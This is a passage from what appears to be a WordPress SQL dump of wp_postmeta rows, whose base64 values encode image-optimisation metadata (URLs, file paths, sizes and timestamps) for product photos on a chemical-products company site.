cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NzJjLXVyZXRoYW5lLWNvbmZvcm1hbC1jb2F0aW5nLTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDcyYy11cmV0aGFuZS1jb25mb3JtYWwtY29hdGluZy0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ3MmMtdXJldGhhbmUtY29uZm9ybWFsLWNvYXRpbmctMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njk5NTIsImlkIjoxNDQ2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDcyYy11cmV0aGFuZS1jb25mb3JtYWwtY29hdGluZy0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ3MmMtdXJldGhhbmUtY29uZm9ybWFsLWNvYXRpbmctMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NzJjLXVyZXRoYW5lLWNvbmZvcm1hbC1jb2F0aW5nLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5OTU0LCJpZCI6MTQ0Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ3MmMtdXJldGhhbmUtY29uZm9ybWFsLWNvYXRpbmctMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NzJjLXVyZXRoYW5lLWNvbmZvcm1hbC1jb2F0aW5nLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDcyYy11cmV0aGFuZS1jb25mb3JtYWwtY29hdGluZy0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2OTk1NywiaWQiOjE0NDZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NzJjLXVyZXRoYW5lLWNvbmZvcm1hbC1jb2F0aW5nLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDcyYy11cmV0aGFuZS1jb25mb3JtYWwtY29hdGluZy0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ3MmMtdXJldGhhbmUtY29uZm9ybWFsLWNvYXRpbmctMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njk5NjAsImlkIjoxNDQ2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDcyYy11cmV0aGFuZS1jb25mb3JtYWwtY29hdGluZy00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ3MmMtdXJldGhhbmUtY29uZm9ybWFsLWNvYXRpbmctNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NzJjLXVyZXRoYW5lLWNvbmZvcm1hbC1jb2F0aW5nLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5OTYyLCJpZCI6MTQ0Nn1d'); 
INSERT INTO `wp_postmeta` VALUES (29464, 1445, 'wpfc_optimisation_reduction', '2396944'); 
INSERT INTO `wp_postmeta` VALUES (29465, 1445, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTUzYm4tcmVsZWFzZS1hZ2VudC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTE1M2JuLXJlbGVhc2UtYWdlbnQuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTE1M2JuLXJlbGVhc2UtYWdlbnQuanBnIiwicmVkdWN0aW9uIjoyMzk2ODg1LCJ0aW1lIjoxNDgzNTY5OTc0LCJpZCI6IjE0NDUifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTE1M2JuLXJlbGVhc2UtYWdlbnQtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xNTNibi1yZWxlYXNlLWFnZW50LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMTUzYm4tcmVsZWFzZS1hZ2VudC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2OTk3NiwiaWQiOjE0NDV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTUzYm4tcmVsZWFzZS1hZ2VudC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTE1M2JuLXJlbGVhc2UtYWdlbnQtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0xNTNibi1yZWxlYXNlLWFnZW50LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5OTc5LCJpZCI6MTQ0NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xNTNibi1yZWxlYXNlLWFnZW50LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTUzYm4tcmVsZWFzZS1hZ2VudC03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTE1M2JuLXJlbGVhc2UtYWdlbnQtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njk5ODIsImlkIjoxNDQ1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTE1M2JuLXJlbGVhc2UtYWdlbnQtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTUzYm4tcmVsZWFzZS1hZ2VudC0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMTUzYm4tcmVsZWFzZS1hZ2VudC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5OTg2LCJpZCI6MTQ0NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xNTNibi1yZWxlYXNlLWFnZW50LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTUzYm4tcmVsZWFzZS1hZ2VudC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTE1M2JuLXJlbGVhc2UtYWdlbnQtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njk5ODksImlkIjoxNDQ1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTE1M2JuLXJlbGVhc2UtYWdlbnQtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xNTNibi1yZWxlYXNlLWFnZW50LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMTUzYm4tcmVsZWFzZS1hZ2VudC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2OTk5MSwiaWQiOjE0NDV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTUzYm4tcmVsZWFzZS1hZ2VudC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTE1M2JuLXJlbGVhc2UtYWdlbnQtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0xNTNibi1yZWxlYXNlLWFnZW50LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5OTk0LCJpZCI6MTQ0NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xNTNibi1yZWxlYXNlLWFnZW50LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTUzYm4tcmVsZWFzZS1hZ2VudC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTE1M2JuLXJlbGVhc2UtYWdlbnQtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njk5OTcsImlkIjoxNDQ1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTUzYm4tcmVsZWFzZS1hZ2VudC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTE1M2JuLXJlbGVhc2UtYWdlbnQtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0xNTNibi1yZWxlYXNlLWFnZW50LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo0NiwidGltZSI6MTQ4MzU3MDAwMCwiaWQiOjE0NDV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xNTNibi1yZWxlYXNlLWFnZW50LTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTUzYm4tcmVsZWFzZS1hZ2VudC0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTE1M2JuLXJlbGVhc2UtYWdlbnQtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzAwMDIsImlkIjoxNDQ1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTUzYm4tcmVsZWFzZS1hZ2VudC0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTE1M2JuLXJlbGVhc2UtYWdlbnQtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0xNTNibi1yZWxlYXNlLWFnZW50LTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwMDA1LCJpZCI6MTQ0NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTE1M2JuLXJlbGVhc2UtYWdlbnQtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xNTNibi1yZWxlYXNlLWFnZW50LTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMTUzYm4tcmVsZWFzZS1hZ2VudC0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MDAwNywiaWQiOjE0NDV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xNTNibi1yZWxlYXNlLWFnZW50LTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTUzYm4tcmVsZWFzZS1hZ2VudC0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTE1M2JuLXJlbGVhc2UtYWdlbnQtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzAwMTIsImlkIjoxNDQ1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTUzYm4tcmVsZWFzZS1hZ2VudC00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTE1M2JuLXJlbGVhc2UtYWdlbnQtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0xNTNibi1yZWxlYXNlLWFnZW50LTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwMDE0LCJpZCI6MTQ0NX1d'); 
INSERT INTO `wp_postmeta` VALUES (29466, 1444, 'wpfc_optimisation_reduction', '2296093'); 
INSERT INTO `wp_postmeta` VALUES (29467, 1444, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTQzeGQtcHRmZS1yZWxlYXNlLWFnZW50LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTQzeGQtcHRmZS1yZWxlYXNlLWFnZW50LmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0xNDN4ZC1wdGZlLXJlbGVhc2UtYWdlbnQuanBnIiwicmVkdWN0aW9uIjoyMjk2MDIxLCJ0aW1lIjoxNDgzNTcwMDI2LCJpZCI6IjE0NDQifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTE0M3hkLXB0ZmUtcmVsZWFzZS1hZ2VudC0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTE0M3hkLXB0ZmUtcmVsZWFzZS1hZ2VudC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTE0M3hkLXB0ZmUtcmVsZWFzZS1hZ2VudC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MDAyOCwiaWQiOjE0NDR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTQzeGQtcHRmZS1yZWxlYXNlLWFnZW50LTgwMHg1MzMuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTQzeGQtcHRmZS1yZWxlYXNlLWFnZW50LTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMTQzeGQtcHRmZS1yZWxlYXNlLWFnZW50LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwMDMxLCJpZCI6MTQ0NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xNDN4ZC1wdGZlLXJlbGVhc2UtYWdlbnQtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xNDN4ZC1wdGZlLXJlbGVhc2UtYWdlbnQtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0xNDN4ZC1wdGZlLXJlbGVhc2UtYWdlbnQtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzAwMzQsImlkIjoxNDQ0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTE0M3hkLXB0ZmUtcmVsZWFzZS1hZ2VudC0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xNDN4ZC1wdGZlLXJlbGVhc2UtYWdlbnQtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTE0M3hkLXB0ZmUtcmVsZWFzZS1hZ2VudC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwMDM4LCJpZCI6MTQ0NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xNDN4ZC1wdGZlLXJlbGVhc2UtYWdlbnQtMj